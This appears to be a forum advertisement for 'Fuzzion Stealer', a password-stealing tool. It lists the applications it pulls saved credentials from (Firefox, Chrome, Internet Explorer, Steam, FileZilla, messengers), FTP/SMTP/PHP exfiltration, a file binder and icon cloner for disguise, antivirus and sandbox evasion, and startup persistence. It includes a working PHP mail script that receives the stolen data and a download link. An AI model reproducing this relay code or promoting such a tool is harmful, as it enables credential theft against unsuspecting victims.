Fetures: Recovery: - Firefox All version [3.5 for private] - chrome [for private] - internet exploler 7,8 [for private] - MSN Messenger - NO-IP - Steam - PaltalkScene - DynDNS - Yahoo Messenger 8.x,9.x [for private] - Filezilla - Pidgin - Triliant Sender Options : - Ftp - Smtp - Php binder options : - bind many file - support mp3,exe,etc... - drop to - file encrypted Fileclonner : - Clone Version Info - Clone Icon - Clone Filesize - FUD Scantime + Runtime : - All strings are encrypted - All your inputted data, (FTP, SMTP, PHP) are encrypted. - All API's encrypted. - Drop File - Windows - System - Temp - Mydocument - Anti Feture - Sandbox - Debugger - Emulator - Sniffer - Virtual Machine - Startup Methode - Run - Runservices - Activex - Shell Mail.php <html> <body> <form method="post" action="mail.php"> <input type="text" name="mail" /> <input type="text" name="Subject" /> <input type="text" name="message" /> <input type="submit"/> </form> <?php if (isset($_POST['mail']) and isset($_POST['message'])and isset($_POST['Subject'])) { $headers ='From: "Fuzzion_Stealer"<Fuzzion_Stealer@hackhound.org>'."\n"; $headers .='Reply-To: Fuzzion@hackhound.org'."\n"; $headers .='Content-Type: text/plain; charset="iso-8859-1"'."\n"; $headers .='Content-Transfer-Encoding: 8bit'; mail($_POST['mail'], $_POST['Subject'], $_POST['message'], $headers); } ?> </body> </html> Download: http://www.2shared.com/file/6987556/504fbb36/Fuzzion_Stealer.html